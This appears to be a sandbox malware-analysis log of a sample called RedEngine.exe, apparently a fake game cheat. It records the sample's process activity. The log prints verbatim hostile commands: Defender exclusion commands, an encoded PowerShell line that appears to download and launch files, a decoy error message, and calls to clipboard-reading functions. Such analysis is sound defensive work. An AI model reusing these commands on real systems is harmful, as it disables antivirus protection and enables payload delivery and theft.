                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "RustClient.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "GTA5.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im tf_win64.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "cs2.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /tn "MyBatchScript"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeProcess created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeProcess created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im tf_win64.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im dota2.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im cs2.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im RustClient.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im GTA5.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im tf_win64.exe
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagiabab3acmapgbtahqayqbyahqalqbqahiabwbjaguacwbzacaacabvahcazqbyahmaaablagwabaagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiaataeeacgbnahuabqblag4adabmagkacwb0acaaigbbagqazaatafqaeqbwaguaiaataeeacwbzaguabqbiagwaeqboageabqblacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsapaajageadabyacmapgbbafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwauae0azqbzahmayqbnaguaqgbvahgaxqa6adoauwboag8adwaoaccarqbyahiabwbyacaaiwa4adeaoqa6acaaqwbhag4abgbvahqaiabzahqayqbyahqaiabkahuazqagahqabwagag0aaqbzahmaaqbuagcaiabkaguacablag4azablag4aywbpaguacwasacaacabsaguayqbzaguaiabpag4acwb0ageababsacaayqbsagwaiab0aggazqagagqazqbwaguabgbkaguabgbjagkazqbzacaacgblaheadqbpahiazqbkac4ajwasaccajwasaccatwblaccalaanaeuacgbyag8acganackapaajagiacqbzacmapga7aciaowa8acmazqbtahyaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwb1agoazgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwb1aheabqajad4aiaataeyabwbyagmazqagadwaiwb3ahcaeaajad4aowakahcaywagad0aiaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqakqa7acqababuagsaiaa9acaajab3agmalgbeag8adwbuagwabwbhagqauwb0ahiaaqbuagcakaanaggadab0ahaacwa6ac8alwbyaguabgb0ahiaeqauag8acgbnac8acabhag4aywblagsangaxadeamqaxadeamqaxadeamqaxadeamqaxac8acgbhahcajwapac4auwbwagwaaqb0acgawwbzahqacgbpag4azwbbaf0axqaiagaacgbgag4aigasacaawwbtahqacgbpag4azwbtahaababpahqatwbwahqaaqbvag4acwbdadoaogboag8abgblackaowagacqazgbuacaapqagafsauwb5ahmadablag0algbjae8algbqageadaboaf0aoga6aecazqb0afiayqbuagqabwbtaeyaaqbsaguatgbhag0azqaoackaowagagyabwbyacaakaakagkapqawadsaiaakagkaiaatagwadaagacqababuagsalgbmaguabgbnahqaaaa7acaajabpacsakwapacaaewagacqadwbjac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaakagwabgbrafsajabpaf0alaagadwaiwbtagmadaajad4aiaaoaeoabwbpag4alqbqageadaboacaapaajagoabqbpacmapgagac0auabhahqaaaagacqazqbuahyaogbbahaacabeageadabhacaapaajagkazwbuacmapgagac0aqwboagkababkafaayqb0aggaiaaoacqazgbuacaakwagacqaaqauafqabwbtahqacgbpag4azwaoackaiaaracaajwauaguaeablaccakqapackaiab9adwaiwb2agkaeaajad4aowagagyabwbyacaakaakagkapqawadsaiaakagkaiaatagwadaagacqababuagsalgbmaguabgbnahqaaaa7acaajabpacsakwapacaaewagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagadwaiwb3aguadaajad4aiaaoaeoabwbpag4alqbqageadaboacaalqbqageadaboacaajablag4adga6aeeacabwaeqayqb0ageaiaa8acmadgb2ahgaiwa+acaalqbdaggaaqbsagqauabhahqaaaagacgajabmag4aiaaracaajabpac4avabvafmadabyagkabgbnacgakqagacsaiaanac4azqb4aguajwapackaiab9acaapaajahgababpacmapga="
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-type -assemblyname system.windows.forms;<#atr#>[system.windows.forms.messagebox]::show('error #819: cannot start due to missing dependencies, please install all the dependencies required.','','ok','error')<#bqs#>;
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\appdata" & powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\local" & powershell.exe -command "set-mppreference -exclusionextension '.exe','.py'""
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagiabab3acmapgbtahqayqbyahqalqbqahiabwbjaguacwbzacaacabvahcazqbyahmaaablagwabaagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiaataeeacgbnahuabqblag4adabmagkacwb0acaaigbbagqazaatafqaeqbwaguaiaataeeacwbzaguabqbiagwaeqboageabqblacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsapaajageadabyacmapgbbafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwauae0azqbzahmayqbnaguaqgbvahgaxqa6adoauwboag8adwaoaccarqbyahiabwbyacaaiwa4adeaoqa6acaaqwbhag4abgbvahqaiabzahqayqbyahqaiabkahuazqagahqabwagag0aaqbzahmaaqbuagcaiabkaguacablag4azablag4aywbpaguacwasacaacabsaguayqbzaguaiabpag4acwb0ageababsacaayqbsagwaiab0aggazqagagqazqbwaguabgbkaguabgbjagkazqbzacaacgblaheadqbpahiazqbkac4ajwasaccajwasaccatwblaccalaanaeuacgbyag8acganackapaajagiacqbzacmapga7aciaowa8acmazqbtahyaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwb1agoazgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwb1aheabqajad4aiaataeyabwbyagmazqagadwaiwb3ahcaeaajad4aowakahcaywagad0aiaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqakqa7acqababuagsaiaa9acaajab3agmalgbeag8adwbuagwabwbhagqauwb0ahiaaqbuagcakaanaggadab0ahaacwa6ac8alwbyaguabgb0ahiaeqauag8acgbnac8acabhag4aywblagsangaxadeamqaxadeamqaxadeamqaxadeamqaxac8acgbhahcajwapac4auwbwagwaaqb0acgawwbzahqacgbpag4azwbbaf0axqaiagaacgbgag4aigasacaawwbtahqacgbpag4azwbtahaababpahqatwbwahqaaqbvag4acwbdadoaogboag8abgblackaowagacqazgbuacaapqagafsauwb5ahmadablag0algbjae8algbqageadaboaf0aoga6aecazqb0afiayqbuagqabwbtaeyaaqbsaguatgbhag0azqaoackaowagagyabwbyacaakaakagkapqawadsaiaakagkaiaatagwadaagacqababuagsalgbmaguabgbnahqaaaa7acaajabpacsakwapacaaewagacqadwbjac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaakagwabgbrafsajabpaf0alaagadwaiwbtagmadaajad4aiaaoaeoabwbpag4alqbqageadaboacaapaajagoabqbpacmapgagac0auabhahqaaaagacqazqbuahyaogbbahaacabeageadabhacaapaajagkazwbuacmapgagac0aqwboagkababkafaayqb0aggaiaaoacqazgbuacaakwagacqaaqauafqabwbtahqacgbpag4azwaoackaiaaracaajwauaguaeablaccakqapackaiab9adwaiwb2agkaeaajad4aowagagyabwbyacaakaakagkapqawadsaiaakagkaiaatagwadaagacqababuagsalgbmaguabgbnahqaaaa7acaajabpacsakwapacaaewagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagadwaiwb3aguadaajad4aiaaoaeoabwbpag4alqbqageadaboacaalqbqageadaboacaajablag4adga6aeeacabwaeqayqb0ageaiaa8acmadgb2ahgaiwa+acaalqbdaggaaqbsagqauabhahqaaaagacgajabmag4aiaaracaajabpac4avabvafmadabyagkabgbnacgakqagacsaiaanac4azqb4aguajwapackaiab9acaapaajahgababpacmapga="Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-type -assemblyname system.windows.forms;<#atr#>[system.windows.forms.messagebox]::show('error #819: cannot start due to missing dependencies, please install all the dependencies required.','','ok','error')<#bqs#>; Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\appdata" & powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\local" & powershell.exe -command "set-mppreference -exclusionextension '.exe','.py'""
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000261E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000261E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE8880 cpuid 14_2_00007FF741BE8880
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GetLocaleInfoA,GlobalUnlock,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,31_2_00007FFB01998660
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GetLocaleInfoA,GlobalUnlock,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,42_2_00007FFB1C5A8660
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: InitCommonControlsEx,RegisterClassW,GetKeyboardLayout,GetLocaleInfoW,TranslateCharsetInfo,42_2_00007FFB1C5C6890
                        Source: C:\Users\user\Desktop\RedEngine.exeQueries volume information: C:\Users\user\Desktop\RedEngine.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
